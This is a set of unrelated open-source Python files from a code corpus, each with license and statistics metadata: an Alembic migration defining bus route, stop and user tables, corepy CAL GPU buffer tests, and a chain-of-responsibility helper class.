Create Date: 2016-11-11 16:39:16.828429
"""
# revision identifiers, used by Alembic.
revision = '3974d310ac43'
down_revision = 'edfc37a36914'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('routes',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('providerId', sa.Integer(), nullable=True),
sa.Column('providerName', sa.String(length=120), nullable=True),
sa.Column('routeName', sa.String(length=20), nullable=True),
sa.Column('pathAttributeId', sa.Integer(), nullable=True),
sa.Column('departure', sa.String(length=20), nullable=True),
sa.Column('destination', sa.String(length=20), nullable=True),
sa.Column('distance', sa.String(length=20), nullable=True),
sa.Column('goFirstBusTime', sa.String(length=4), nullable=True),
sa.Column('backFirstBusTime', sa.String(length=4), nullable=True),
sa.Column('goLastBusTime', sa.String(length=4), nullable=True),
sa.Column('backLastBusTime', sa.String(length=4), nullable=True),
sa.Column('holidayGoFirstBusTime', sa.String(length=4), nullable=True),
sa.Column('holidayBackFirstBusTime', sa.String(length=4), nullable=True),
sa.Column('holidayGoLastBusTime', sa.String(length=4), nullable=True),
sa.Column('holidayBackLastBusTime', sa.String(length=4), nullable=True),
sa.Column('segmentBuffer', sa.String(length=200), nullable=True),
sa.Column('ticketPriceDescription', sa.String(length=20), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_table('stops',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('routeId', sa.Integer(), nullable=True),
sa.Column('routeName', sa.String(length=200), nullable=True),
sa.Column('seqNo', sa.Integer(), nullable=True),
sa.Column('longitude', sa.String(length=50), nullable=True),
sa.Column('latitude', sa.String(length=50), nullable=True),
sa.Column('goBack', sa.String(length=2), nullable=True),
sa.Column('address', sa.String(length=200), nullable=True),
sa.Column('stopLocationId', sa.Integer(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_table('users',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('chatid', sa.Integer(), nullable=True),
sa.Column('last_name', sa.String(length=120), nullable=True),
sa.Column('first_name', sa.String(length=120), nullable=True),
sa.Column('lat', sa.String(length=50), nullable=True),
sa.Column('lng', sa.String(length=50), nullable=True),
sa.Column('cmd', sa.String(length=1000), nullable=True),
sa.Column('bus_route', sa.String(length=50), nullable=True),
sa.PrimaryKeyConstraint('id')
)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_table('users')
op.drop_table('stops')
op.drop_table('routes')
### end Alembic commands ###
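
# To apply or revert this revision from the command line (sketch; assumes a
# configured Alembic environment):
#
#     alembic upgrade 3974d310ac43
#     alembic downgrade edfc37a36914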
| apache-2.0 | 1,569,172,373,200,974,000 | 41.746479 | 77 | 0.685008 | false |
matthiaskramm/corepy | examples/cal/buffers.py | 1 | 3037 | import corepy.lib.extarray as extarray
import corepy.arch.cal.isa as cal
import corepy.arch.cal.types.registers as reg
import corepy.arch.cal.platform as env
def test_4comp():
proc = env.Processor(0)
prgm = env.Program()
code = prgm.get_stream()
inp = proc.alloc_remote('i', 1, 4, 1)
out = proc.alloc_remote('i', 4, 1, 1)
for i in xrange(0, 4):
inp[i] = i + 1
out[i] = 0
print "inp", inp[0:4]
print "out", out[0:4]
cal.set_active_code(code)
cal.dcl_output(reg.o0, USAGE=cal.usage.generic)
cal.dcl_resource(0, cal.pixtex_type.oned, cal.fmt.float, UNNORM=True) # positions
r_cnt = prgm.acquire_register()
r = prgm.acquire_registers(4)
cal.mov(r_cnt, r_cnt('0000'))
for i in xrange(0, 4):
cal.sample(0, 0, r[i].x000, r_cnt.x)
cal.add(r_cnt, r_cnt, r_cnt('1111'))
cal.iadd(r[0], r[0], r[1]('0x00'))
cal.iadd(r[0], r[0], r[2]('00x0'))
cal.iadd(r[0], r[0], r[3]('000x'))
cal.iadd(r[0], r[0], r[0])
cal.mov(reg.o0, r[0])
prgm.set_binding(reg.i0, inp)
prgm.set_binding(reg.o0, out)
prgm.add(code)
prgm.print_code()
proc.execute(prgm, (0, 0, 1, 1))
print "inp", inp[0:4]
print "out", out[0:4]
for i in xrange(0, 4):
assert(out[i] == (i + 1) * 2)
return
def test_1comp():
proc = env.Processor(0)
prgm = env.Program()
code = prgm.get_stream()
inp = proc.alloc_remote('i', 4, 1, 1)
out = proc.alloc_remote('i', 1, 4, 1)
for i in xrange(0, 4):
inp[i] = i + 1
out[i] = 0
print "inp", inp[0:4]
print "out", out[0:4]
cal.set_active_code(code)
cal.dcl_output(reg.o0, USAGE=cal.usage.generic)
cal.dcl_resource(0, cal.pixtex_type.oned, cal.fmt.float, UNNORM=True) # positions
r = prgm.acquire_register()
cal.sample(0, 0, r.x000, r('0000'))
#cal.iadd(r[0], r[0], r[1]('0x00'))
#cal.iadd(r[0], r[0], r[2]('00x0'))
#cal.iadd(r[0], r[0], r[3]('000x'))
cal.iadd(r, r, r)
cal.mov(reg.o0.x, r)
prgm.set_binding(reg.i0, inp)
prgm.set_binding(reg.o0, out)
prgm.add(code)
prgm.print_code()
proc.execute(prgm, (0, 0, 4, 1))
print "inp", inp[0:4]
print "out", out[0:4]
for i in xrange(0, 4):
assert(out[i] == 2)
return
def test_foo():
proc = env.Processor(0)
prgm = env.Program()
code = prgm.get_stream()
cal.set_active_code(code)
cb = proc.alloc_remote('i', 1, 4, 1)
out = proc.alloc_remote('i', 4, 1, 1)
gb = proc.alloc_remote('i', 1, 4, 1, True)
for i in xrange(0, 4):
cb[i] = i + 1
out[i] = 42
gb[i] = 67
cal.dcl_output(reg.o0, USAGE=cal.usage.generic)
cal.dcl_cb('cb0[4]')
cal.mov('r0', 'cb0[0]')
cal.mov('r1', 'cb0[1]')
#cal.mov('r2', 'cb0[2]')
#cal.mov('r3', 'cb0[3]')
cal.mov('o0', 'r0')
cal.mov('g[0]', 'r0')
prgm.set_binding('cb0', cb)
prgm.set_binding('o0', out)
prgm.set_binding('g[]', gb)
prgm.add(code)
prgm.print_code()
proc.execute(prgm, (0, 0, 1, 1))
print "cb ", cb[0:4]
print "out", out[0:4]
print "gb ", gb[0:4]
return
if __name__ == '__main__':
test_4comp()
test_1comp()
test_foo()
| bsd-3-clause | 7,764,453,063,671,404,000 | 19.38255 | 83 | 0.575568 | false |
mcfongtw/MkConfig | mkconfig/core/chain.py | 1 | 1494 | import logging
logger = logging.getLogger(__name__)
class ChainOfTransfiguration(object):
"""
A chain of responsibility implementation that channel through a series of transifgurations. One may depend
on previous step with respect to Context
"""
_chain = []
_context = {}
def __init__(self):
self._chain = []
self._context = {}
def add(self, transfiguration):
"""
Add a transfiguration into the chain of execution.
:param transfiguration: a transfiguration to be added
"""
self._chain.append(transfiguration)
logger.debug('Add transfiguration : [%s] to chain', transfiguration.__class__)
def get(self, index):
"""
        Retrieve the transfiguration in the chain at position [index]

        :param index: position in the chain, from 0 to size() - 1
:return: the transfiguration at chain[index]
"""
return self._chain[index]
def size(self):
"""
        Retrieve the number of transfigurations in the chain.
:return: length of chain
"""
return len(self._chain)
def execute(self, context = None):
"""
        Execute the transfigurations one by one, in the order they were added.

        :param context: a map of key-value attributes shared by the transfigurations
"""
        for transfiguration in self._chain:
logger.info("Performing Transfiguration [%s]", transfiguration.__class__)
transfiguration.perform(context)
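
# Minimal usage sketch (hypothetical transfiguration; any object exposing
# perform(context) qualifies):
if __name__ == '__main__':
    class Uppercase(object):
        def perform(self, context):
            context['name'] = context['name'].upper()

    chain = ChainOfTransfiguration()
    chain.add(Uppercase())
    ctx = {'name': 'mkconfig'}
    chain.execute(ctx)
    print(ctx['name'])  # -> MKCONFIG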
| mit | -3,838,645,005,129,700,400 | 24.322034 | 110 | 0.609103 | false |